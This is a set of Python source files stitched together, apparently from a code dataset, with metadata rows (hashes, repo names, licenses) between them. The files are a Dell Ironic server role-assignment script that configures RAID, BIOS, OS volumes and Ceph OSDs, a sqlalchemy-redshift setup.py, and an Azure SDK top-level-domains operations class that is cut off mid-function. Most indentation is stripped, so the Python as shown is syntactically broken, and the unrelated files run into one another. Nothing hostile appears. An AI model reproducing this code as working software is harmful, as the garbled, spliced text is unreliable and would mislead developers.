# To manually clean the ironic node, it must be in the manageable state.
success = place_node_in_manageable_state(ironic_client, node_uuid)
if not success:
LOG.critical("Could not place node into the manageable state")
return False
# To facilitate workarounds to bugs in the ironic DRAC driver's RAID
# clean steps, execute manual cleaning twice, first to delete the
# configuration, and then to create it. The workarounds are inserted
# in-between.
'''TODO: After those upstream bugs have been resolved, perform both
    clean steps, delete_configuration() and create_configuration(),
during one (1) manual cleaning.'''
LOG.info("Deleting the existing RAID configuration")
clean_steps = [{'interface': 'raid', 'step': 'delete_configuration'}]
ironic_client.node.set_provision_state(
node_uuid,
'clean',
cleansteps=clean_steps)
LOG.info("Waiting for deletion of the existing RAID configuration to "
"complete")
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
LOG.info("Completed deletion of the existing RAID configuration")
# Work around the bugs in the ironic DRAC driver's RAID clean steps.
target_raid_config = define_target_raid_config(
super_role, drac_client)
if target_raid_config is None:
return False
if not target_raid_config['logical_disks']:
place_node_in_available_state(ironic_client, node_uuid)
return True
# Set the target RAID configuration on the ironic node.
ironic_client.node.set_target_raid_config(node_uuid, target_raid_config)
LOG.info("Applying the new RAID configuration")
clean_steps = [{'interface': 'raid', 'step': 'create_configuration'}]
ironic_client.node.set_provision_state(
node_uuid,
'clean',
cleansteps=clean_steps)
LOG.info(
"Waiting for application of the new RAID configuration to complete")
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
LOG.info("Completed application of the new RAID configuration")
# Return the ironic node to the available state.
place_node_in_available_state(ironic_client, node_uuid)
LOG.info("Completed RAID configuration")
return True
def place_node_in_manageable_state(ironic_client, node_uuid):
node = ironic_client.node.get(node_uuid, fields=['provision_state'])
if node.provision_state != 'manageable':
ironic_client.node.set_provision_state(node_uuid, 'manage')
ironic_client.node.wait_for_provision_state(node_uuid, 'manageable')
return True
def place_node_in_available_state(ironic_client, node_uuid):
# Return the ironic node to the available state.
ironic_client.node.set_provision_state(node_uuid, 'provide')
ironic_client.node.wait_for_provision_state(node_uuid, 'available')
def assign_role(ip_mac_service_tag, node_uuid, role_index,
ironic_client):
if role_index.role not in ROLES.keys():
flavor = role_index.role
else:
flavor = ROLES[role_index.role]
LOG.info(
"Setting role for {} to {}, flavor {}".format(
ip_mac_service_tag,
role_index.role,
flavor))
node = ironic_client.node.get(node_uuid, fields=['properties'])
    _is_index = bool(role_index.index)
_role = ("node:{}-{}".format(flavor, role_index.index)
if _is_index else {"profile": flavor})
value = ("{},{},boot_mode:uefi,boot_option:"
"local".format(_role, node.properties['capabilities']))
LOG.info(str(node.properties))
LOG.info(str(value))
patch = [{'op': 'add',
'value': value,
'path': '/properties/capabilities'}]
ironic_client.node.update(node_uuid, patch)
LOG.info(str(patch))
def generate_osd_config(ip_mac_service_tag, drac_client):
controllers = drac_client.list_raid_controllers()
LOG.info("Generating OSD config for {ip}".format(ip=ip_mac_service_tag))
system_id = drac_client.get_system().uuid
spinners, ssds, nvme_drives = get_drives(drac_client)
new_osd_config = None
# Let ceph handle journaling/disks assignment
disks = spinners + ssds + nvme_drives
new_osd_config = generate_osd_config_without_journals(controllers,
disks)
# load the osd environment file
osd_config_file = os.path.join(Constants.TEMPLATES, "ceph-osd-config.yaml")
stream = open(osd_config_file, 'r+')
while True:
try:
fcntl.flock(stream, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno != errno.EAGAIN:
raise
else:
time.sleep(1)
try:
        current_osd_configs = yaml.safe_load(stream)
node_data_lookup_str = \
current_osd_configs["parameter_defaults"]["NodeDataLookup"]
if not node_data_lookup_str:
node_data_lookup = {}
else:
LOG.info(str(node_data_lookup_str))
node_data_lookup = json.loads(json.dumps(node_data_lookup_str))
LOG.info("Checking for existing config ")
if system_id in node_data_lookup:
current_osd_config = node_data_lookup[system_id]
if new_osd_config == current_osd_config:
LOG.info("The generated OSD configuration for "
"{ip_mac_service_tag} ({system_id}) is the same as the "
"one in {osd_config_file}. Skipping OSD "
"configuration.".format(
ip_mac_service_tag=ip_mac_service_tag,
system_id=system_id,
osd_config_file=osd_config_file))
return
else:
generated_config = json.dumps(new_osd_config, sort_keys=True,
indent=2, separators=(',', ': '))
current_config = json.dumps(current_osd_config, sort_keys=True,
indent=2, separators=(',', ': '))
raise RuntimeError("The generated OSD configuration for "
"{ip_mac_service_tag} ({system_id}) is "
"different from the one in {osd_config_file}.\n"
"Generated:\n{generated_config}\n\n"
"Current:\n{current_config}\n\n"
"If this is unexpected, then check for failed"
" drives. If this is expected, then delete the"
" configuration for this node from "
"{osd_config_file} and rerun "
"assign_role.".format(
ip_mac_service_tag=ip_mac_service_tag,
system_id=system_id,
osd_config_file=osd_config_file,
generated_config=generated_config,
current_config=current_config))
node_data_lookup[system_id] = new_osd_config
# make a backup copy of the file
osd_config_file_backup = osd_config_file + ".bak"
LOG.info("Backing up original OSD config file to "
"{osd_config_file_backup}".format(
osd_config_file_backup=osd_config_file_backup))
copyfile(osd_config_file, osd_config_file_backup)
# save the new config
LOG.info("Saving new OSD config to {osd_config_file}".format(
osd_config_file=osd_config_file))
# Using the simple yaml.dump results in a completely
# unreadable file, so we do it the hard way to create
# something more user friendly
stream.seek(0)
with open(osd_config_file + ".orig", 'r') as instream:
for line in instream:
if '{}' not in line:
stream.write(line)
osd_config_str = json.dumps(node_data_lookup,
sort_keys=True,
indent=2,
separators=(',', ': '))
for line in osd_config_str.split('\n'):
line = " " + line + "\n"
stream.write(line)
stream.truncate()
instream.close()
finally:
fcntl.flock(stream, fcntl.LOCK_UN)
stream.close()
def get_drives(drac_client):
spinners = []
ssds = []
virtual_disks = drac_client.list_virtual_disks()
nvme_drives = []
raid0_disks = [vd for vd in virtual_disks if vd.raid_level != '1']
raid1_disks = []
for vd in virtual_disks:
if vd.raid_level == '1':
raid1_disks.extend(vd.physical_disks)
    # Get all physical disks except those backing the RAID1 virtual disks
physical_disks = {pd.id: pd for pd in drac_client.list_physical_disks()
if pd.id not in raid1_disks}
for virtual_disk in raid0_disks:
phy_disks = [physical_disks[pd_id] for pd_id
in virtual_disk.physical_disks]
if phy_disks[0].media_type == 'hdd':
spinners.append(virtual_disk)
else:
ssds.append(virtual_disk)
        for pd in phy_disks:
            physical_disks.pop(pd.id)
if physical_disks:
for pd_id in physical_disks:
# Get all NVMe drives
if is_nvme_drive(physical_disks[pd_id]):
nvme_drives.append(physical_disks[pd_id])
continue
# Eliminate physical disks in a state other than non-RAID
# including failed disks
if physical_disks[pd_id].raid_status != "non-RAID":
LOG.info("Skipping disk {id}, because it has a RAID status of "
"{raid_status}".format(
id=physical_disks[pd_id].id,
raid_status=physical_disks[pd_id].raid_status))
continue
# Eliminate physical disks that have an error status
if physical_disks[pd_id].status == 'error':
LOG.warning("Not using disk {id}, because it has a status of "
"{status}".format(
id=physical_disks[pd_id].id,
status=physical_disks[pd_id].status))
continue
# Go ahead and use any physical drive that's not in an error state,
# but issue a warning if it's not in the ok or unknown state
if physical_disks[pd_id].status != 'ok' \
and physical_disks[pd_id].status != 'unknown':
LOG.warning("Using disk {id}, but it has a status of \""
"{status}\"".format(
id=physical_disks[pd_id].id,
status=physical_disks[pd_id].status))
if physical_disks[pd_id].media_type == "hdd":
spinners.append(physical_disks[pd_id])
else:
ssds.append(physical_disks[pd_id])
return spinners, ssds, nvme_drives
def generate_osd_config_without_journals(controllers, drives):
osd_config = {
'osd_scenario': 'lvm',
'osd_objectstore': 'bluestore',
'devices': []}
    # On RHEL 8, generate by-path device names using a common SAS address for
    # both HDDs and SSDs, based on the first SAS address found in alphabetical order
sas_ls = []
for drive in drives:
if is_nvme_drive(drive):
continue
else:
sas_ls.append(drive.sas_address.lower()[:-2])
sas_ls.sort()
for drive in drives:
if is_nvme_drive(drive):
nvme_device_name = get_by_path_nvme_device_name(drive)
osd_config['devices'].append(nvme_device_name)
else:
base_sas = sas_ls[0]
drive_device_name = get_by_path_device_name(
drive, controllers, base_sas)
osd_config['devices'].append(drive_device_name)
return osd_config
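# Hedged illustration of the structure this function returns (the device
# paths below are hypothetical):
#   {'osd_scenario': 'lvm',
#    'osd_objectstore': 'bluestore',
#    'devices': ['/dev/disk/by-path/pci-0000:18:00.0-scsi-0:2:0:0',
#                '/dev/disk/by-path/pci-0000:3b:00.0-nvme-1']}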
# This method can be called with either a physical or a virtual disk.
# Only physical disks can be NVMe drives, and only physical disks
# have an attribute named 'device_protocol'. As a result, the method
# returns True only if device_protocol is present and indicates NVMe.
def is_nvme_drive(disk):
    return bool(
        hasattr(disk, "device_protocol") and disk.device_protocol
        and disk.device_protocol.startswith("NVMe"))
def get_by_path_nvme_device_name(physical_disk):
bus = physical_disk.bus.lower()
    return '/dev/disk/by-path/pci-0000:' + str(bus) + ':00.0-nvme-1'
def get_by_path_device_name(physical_disk, controllers, ref_sas):
if physical_disk.description.startswith("Virtual Disk"):
disk_index = physical_disk.description.split(" ")[2]
else:
disk_index = physical_disk.description.split(" ")[1]
for controller in controllers:
pci_bus_number = get_pci_bus_number(controller)
if physical_disk.controller == controller.id and \
controller.model.startswith("PERC H740P"):
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:2:{disk_index}:0').format(
pci_bus_number=pci_bus_number,
disk_index=disk_index)
elif physical_disk.controller == controller.id and \
controller.model.startswith("PERC H730"):
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:'
'{channel}:{disk_index}:0').format(
pci_bus_number=pci_bus_number,
channel=2 if physical_disk.raid_status == "online" else 0,
disk_index=disk_index)
else:
return ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-sas-exp0x{sas_address}ff-phy{dindex}-lun-0').format(
pci_bus_number=pci_bus_number,
sas_address=ref_sas, dindex=disk_index)
def get_pci_bus_number(controller):
if controller.model.startswith("PERC H730") and \
len(controller.bus.lower()) == 1:
pci_bus_number = '0' + controller.bus.lower()
else:
pci_bus_number = controller.bus.lower()
return pci_bus_number
def get_fqdd(doc, namespace):
return utils.find_xml(doc, 'FQDD', namespace).text
def get_size_in_bytes(doc, namespace):
return utils.find_xml(doc, 'SizeInBytes', namespace).text
def select_os_volume(os_volume_size_gb, ironic_client, drac_client, node_uuid):
if os_volume_size_gb is None:
# Detect BOSS Card and find the volume size
lst_ctrls = drac_client.list_raid_controllers()
        for ct in lst_ctrls:
if ct.model.startswith("BOSS"):
pci_bus_number = ct.bus.lower()
boss_disk = \
[ctrl.id for ctrl in lst_ctrls if ctrl.model.startswith("BOSS")]
LOG.info("Boss : " + str(boss_disk))
if boss_disk:
lst_physical_disks = drac_client.list_physical_disks()
for disks in lst_physical_disks:
if disks.controller in boss_disk:
os_volume_size_gb = int(disks.size_mb / 1024)
LOG.info("Detect BOSS Card {} and volume size {}".format(
disks.controller,
os_volume_size_gb))
by_path = '/dev/disk/by-path/pci-0000:' \
+ str(pci_bus_number) + ':00.0-ata-1'
LOG.info("..> " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
return
else:
drac_client = drac_client.client
# Get the virtual disks
virtual_disk_view_doc = drac_client.enumerate(DCIM_VirtualDiskView)
virtual_disk_docs = utils.find_xml(virtual_disk_view_doc,
'DCIM_VirtualDiskView',
DCIM_VirtualDiskView,
True)
raid_physical_disk_ids = []
# Look for a RAID of any type other than RAID0 and assume we want
# to install the OS on that volume. The first non-RAID0 found
# will be used.
raid_size_gb = 0
for virtual_disk_doc in virtual_disk_docs:
fqdd = get_fqdd(virtual_disk_doc, DCIM_VirtualDiskView)
raid_type = utils.find_xml(virtual_disk_doc, 'RAIDTypes',
DCIM_VirtualDiskView).text
if raid_type != NORAID and raid_type != RAID0:
LOG.info("...")
LOG.info("using bypath for VD hint")
if lst_ctrls[0].model.startswith("PERC H740P"):
pci_bus_number = get_pci_bus_number(lst_ctrls[0])
if "PowerEdge R7515" in str(ironic_client.node.get(node_uuid, fields=['properties'])):
by_path='/dev/disk/by-path/pci-0000:0' \
+ str(pci_bus_number) + ':00.0-scsi-0:2:0:0'
else:
by_path='/dev/disk/by-path/pci-0000:' \
+ str(pci_bus_number) + ':00.0-scsi-0:2:0:0'
LOG.info(".. " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
elif lst_ctrls[0].model.startswith("PERC H730"):
LOG.info("using bypath for VD hint")
pci_bus_number = get_pci_bus_number(lst_ctrls[0])
LOG.info(">> " + str(lst_ctrls[0].description))
by_path = ('/dev/disk/by-path/pci-0000:'
'{pci_bus_number}:00.0-scsi-0:2:0:0').format(
pci_bus_number=pci_bus_number)
LOG.info(".. " + str(by_path))
patch = [{'op': 'add',
'value': {"by_path": by_path},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
# Get the size
raid_size = get_size_in_bytes(virtual_disk_doc,
DCIM_VirtualDiskView)
raid_size_gb = int(int(raid_size) / units.Gi)
# Get the physical disks that back this RAID
raid_physical_disk_docs = utils.find_xml(
virtual_disk_doc,
'PhysicalDiskIDs',
DCIM_VirtualDiskView,
True)
for raid_physical_disk_doc in raid_physical_disk_docs:
raid_physical_disk_id = raid_physical_disk_doc.text
raid_physical_disk_ids.append(raid_physical_disk_id)
LOG.debug(
"Found RAID {} virtual disk {} with a size of {} "
"bytes comprised of physical disks:\n {}".format(
RAID_TYPE_TO_DESCRIPTION[raid_type],
fqdd,
raid_size,
"\n ".join(raid_physical_disk_ids)))
return
        # Note: This code block handles the single-disk scenario.
if raid_size_gb == 0:
if virtual_disk_docs:
raid0_disk_sizes = []
for virtual_disk_doc in virtual_disk_docs:
fqdd = get_fqdd(virtual_disk_doc, DCIM_VirtualDiskView)
raid_type = utils.find_xml(
virtual_disk_doc,
'RAIDTypes',
DCIM_VirtualDiskView).text
if raid_type == RAID0:
raid_size = get_size_in_bytes(virtual_disk_doc,
DCIM_VirtualDiskView)
raid_size_gb = int(int(raid_size) / units.Gi)
raid0_disk_sizes.append(raid_size_gb)
# Get the physical disks that back this RAID
raid_physical_disk_docs = utils.find_xml(
virtual_disk_doc,
'PhysicalDiskIDs',
DCIM_VirtualDiskView,
True)
for raid_physical_disk_doc in \
raid_physical_disk_docs:
raid_physical_disk_id = \
raid_physical_disk_doc.text
raid_physical_disk_ids.append(
raid_physical_disk_id)
LOG.debug(
"Found RAID {} virtual disk {} with a size of"
" {} "
"bytes comprised of physical disks:\n"
" {}".format(
RAID_TYPE_TO_DESCRIPTION[raid_type],
fqdd,
raid_size,
"\n ".join(raid_physical_disk_ids)))
break
if len(raid0_disk_sizes) != 1:
raise RuntimeError(
"There must be a non-RAID0 virtual disk,"
"a single disk RAID0, or a single JBOD disk"
"to install the OS on,"
"or os-volume-size-gb must be specified.")
else:
physical_disk_view_doc = drac_client.enumerate(
DCIM_PhysicalDiskView)
physical_disk_docs = utils.find_xml(
physical_disk_view_doc,
'DCIM_PhysicalDiskView',
DCIM_PhysicalDiskView,
True)
physical_disk_sizes = [
get_size_in_bytes(physical_disk_doc,
DCIM_PhysicalDiskView)
for physical_disk_doc in physical_disk_docs]
if len(physical_disk_sizes) != 1:
raise RuntimeError(
"There must be a non-RAID0 virtual disk,"
"a single disk RAID0, or a single JBOD disk"
"to install the OS on,"
"or os-volume-size-gb must be specified.")
os_volume_size_gb = int(int(physical_disk_sizes[0]) / units.Gi)
# Now check to see if we have any physical disks that don't back
# the RAID that are the same size as the RAID
# Get the physical disks
physical_disk_view_doc = drac_client.enumerate(
DCIM_PhysicalDiskView)
physical_disk_docs = utils.find_xml(physical_disk_view_doc,
'DCIM_PhysicalDiskView',
DCIM_PhysicalDiskView,
True)
for physical_disk_doc in physical_disk_docs:
fqdd = get_fqdd(physical_disk_doc, DCIM_PhysicalDiskView)
if fqdd not in raid_physical_disk_ids:
physical_disk_size = get_size_in_bytes(
physical_disk_doc, DCIM_PhysicalDiskView)
physical_disk_size_gb = int(int(physical_disk_size) / units.Gi)
if physical_disk_size_gb == raid_size_gb:
# If we did find a disk that's the same size as the
# located RAID (in GB), then we can't tell Ironic what
# volume to install the OS on.
# Abort the install at this point instead of having
# the OS installed on a random volume.
raise RuntimeError(
"Physical disk {} has the same size in GB ({}) "
"as the RAID. Unable to specify the OS disk to "
"Ironic.".format(fqdd, physical_disk_size_gb))
if os_volume_size_gb is not None:
# If os_volume_size_gb was specified then just blindly use that
raid_size_gb = os_volume_size_gb
volume_type = "volume"
else:
# If we didn't find a disk the same size as the located RAID, then use
# the size of the RAID set above
volume_type = RAID_TYPE_TO_DESCRIPTION[raid_type]
# Set the root_device property in ironic to the volume size in gigs
LOG.info("Setting the OS volume for this node to the {} with size "
"{} GB".format(volume_type, raid_size_gb))
patch = [{'op': 'add',
'value': {"size": raid_size_gb},
'path': '/properties/root_device'}]
ironic_client.node.update(node_uuid, patch)
def configure_bios(node, ironic_client, settings, drac_client):
LOG.info("Configuring BIOS: settings: {}".format(str(settings)))
LOG.info("Configuring BIOS: node: {}".format(str(node)))
if 'drac' not in node.driver:
LOG.critical("Node is not being managed by an iDRAC driver")
return False
# Make sure the iDRAC is ready before configuring BIOS
drac_client.wait_until_idrac_is_ready()
# Filter out settings that are unknown.
response = ironic_client.node.vendor_passthru(
node.uuid,
'get_bios_config',
http_method='GET')
unknown_attribs = set(settings).difference(response.__dict__)
if unknown_attribs:
LOG.warning(
"Disregarding unknown BIOS settings {}".format(
', '.join(unknown_attribs)))
for attr in unknown_attribs:
del settings[attr]
response = ironic_client.node.vendor_passthru(
node.uuid,
'set_bios_config',
args=settings,
http_method='POST')
if not response.is_commit_required:
LOG.info("Completed BIOS configuration")
return True
LOG.info("Rebooting the node to apply BIOS configuration")
args = {'reboot': True}
response = ironic_client.node.vendor_passthru(
node.uuid,
'commit_bios_config',
args=args,
http_method='POST')
LOG.info(
"Waiting for BIOS configuration to complete; this may take some time")
LOG.info("Do not power off the node")
job_ids = [response.job_id]
JobHelper.wait_for_job_completions(ironic_client, node.uuid)
LOG.info("Completed BIOS configuration")
return JobHelper.determine_job_outcomes(drac_client, job_ids)
def ensure_node_is_powered_off(drac_client):
# Power off the node only if it is not already powered off. The Dell Common
# Information Model Extensions (DCIM) method used to power off a node is
# not idempotent.
#
# Testing found that attempting to power off a node while it is powered off
# raises an exception, DRACOperationFailed with the message 'The command
# failed to set RequestedState'. That message is associated with a message
# ID output parameter of the DCIM_ComputerSystem.RequestStateChange()
# method. The message ID is SYS021. This is documented in the Base Server
# and Physical Asset Profile, Version 1.2.0
# (http://en.community.dell.com/techcenter/extras/m/white_papers/20440458/download).
# See section 8.1 DCIM_ComputerSystem.RequestStateChange(), beginning on p.
# 22 of 25.
#
# An alternative approach was considered, unconditionally powering off the
# node, catching the DRACOperationFailed exception, and ignoring it.
# However, because neither the documentation nor exception provides details
# about the cause, that approach could mask an interesting error condition.
    if drac_client.get_power_state() != POWER_OFF:
LOG.info("Powering off the node")
drac_client.set_power_state(POWER_OFF)
def main():
try:
drac_client = None
args = parse_arguments()
LoggingHelper.configure_logging(args.logging_level)
flavor_settings_filename = os.path.expanduser(args.flavor_settings)
flavor_settings = get_flavor_settings(flavor_settings_filename)
if flavor_settings is None:
sys.exit(1)
ironic_client = IronicHelper.get_ironic_client()
node = IronicHelper.get_ironic_node(ironic_client,
args.ip_mac_service_tag)
if node is None:
LOG.critical("Unable to find node {}".format(
args.ip_mac_service_tag))
sys.exit(1)
drac_client = get_drac_client(args.node_definition, node)
        # Assume any node role that is not in ROLES is an edge compute role,
        # and apply the compute BIOS settings accordingly
super_role = args.role_index.role
if super_role not in ROLES.keys():
super_role = 'compute'
assign_role(
args.ip_mac_service_tag,
node.uuid,
args.role_index,
ironic_client)
if node.driver == "idrac":
bios_settings = calculate_bios_settings(
super_role,
flavor_settings,
flavor_settings_filename)
if bios_settings is None:
sys.exit(1)
if not args.skip_raid_config:
succeeded = configure_raid(
ironic_client,
node.uuid,
super_role,
args.os_volume_size_gb,
drac_client)
if not succeeded:
sys.exit(1)
else:
LOG.info("Skipping RAID configuration")
if not args.skip_bios_config:
succeeded = configure_bios(
node,
ironic_client,
bios_settings,
drac_client)
if not succeeded:
sys.exit(1)
else:
LOG.info("Skipping BIOS configuration")
# Select the volume for the OS to be installed on
select_os_volume(args.os_volume_size_gb, ironic_client, drac_client,
node.uuid)
if args.role_index.role not in ROLES.keys():
flavor = args.role_index.role
else:
flavor = ROLES[args.role_index.role]
# Generate Ceph OSD/journal configuration for storage nodes
if flavor == "ceph-storage" or flavor == "computehci" or flavor == "powerflex-storage":
generate_osd_config(args.ip_mac_service_tag, drac_client)
except (DRACOperationFailed, DRACUnexpectedReturnValue,
InternalServerError, KeyError, TypeError, ValueError,
WSManInvalidResponse, WSManRequestFailure):
LOG.exception("")
sys.exit(1)
except SystemExit:
raise
except: # noqa: E722
LOG.exception("Unexpected error")
sys.exit(1)
finally:
# Leave the node powered off.
if drac_client is not None:
ensure_node_is_powered_off(drac_client)
if __name__ == "__main__":
main()
| 39.078999
| 110
| 0.603241
|
f07de8aeac764fd94669f1ab488b9c68166c7eef
| 1,712
|
py
|
Python
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2019-06-04T21:01:13.000Z
|
2019-06-04T21:01:13.000Z
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2020-05-23T10:54:44.000Z
|
2020-05-23T10:54:44.000Z
|
setup.py
|
aboedo/sqlalchemy-redshift
|
bf81bb81e42987bb81345845fede560d9184302f
|
[
"MIT"
] | 1
|
2020-12-24T10:20:24.000Z
|
2020-12-24T10:20:24.000Z
|
from setuptools import setup
readme = open('README.rst').read()
history = open('CHANGES.rst').read().replace('.. :changelog:', '')
setup(
name='sqlalchemy-redshift',
version='0.5.1.dev0',
description='Amazon Redshift Dialect for sqlalchemy',
long_description=readme + '\n\n' + history,
author='Matt George',
author_email='mgeorge@gmail.com',
maintainer='Thomas Grainger',
maintainer_email='sqlalchemy-redshift@graingert.co.uk',
license="MIT",
url='https://github.com/sqlalchemy-redshift/sqlalchemy-redshift',
packages=['sqlalchemy_redshift', 'redshift_sqlalchemy'],
package_data={'sqlalchemy_redshift': ['redshift-ssl-ca-cert.pem']},
install_requires=[
'psycopg2>=2.5',
# requires sqlalchemy.sql.base.DialectKWArgs.dialect_options, new in
# version 0.9.2
'SQLAlchemy>=0.9.2',
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
],
entry_points={
'sqlalchemy.dialects': [
'redshift = sqlalchemy_redshift.dialect:RedshiftDialect',
'redshift.psycopg2 = sqlalchemy_redshift.dialect:RedshiftDialect',
]
},
)
| 36.425532
| 78
| 0.623832
|
3d26bcd39754fa5a4d960e31e422509bacafe3e1
| 9,754
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/top_level_domains_operations.py
|
CharaD7/azure-sdk-for-python
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class TopLevelDomainsOperations(object):
"""TopLevelDomainsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_get_top_level_domains(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all top level domains supported for registration.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TopLevelDomainPaged
<azure.mgmt.web.models.TopLevelDomainPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.TopLevelDomainPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.TopLevelDomainPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_top_level_domain(
self, name, custom_headers=None, raw=False, **operation_config):
"""Gets details of a top level domain.
:param name: Name of the top level domain
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TopLevelDomain <azure.mgmt.web.models.TopLevelDomain>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('TopLevelDomain', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_top_level_domain_agreements(
self, name, include_privacy=None, custom_headers=None, raw=False, **operation_config):
"""Lists legal agreements that user needs to accept before purchasing
domain.
:param name: Name of the top level domain
:type name: str
:param include_privacy: If true then the list of agreements will
         include agreements for domain privacy as well.
:type include_privacy: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`TldLegalAgreementPaged
<azure.mgmt.web.models.TldLegalAgreementPaged>`
"""
agreement_option = models.TopLevelDomainAgreementOption(include_privacy=include_privacy)
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.TldLegalAgreementPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
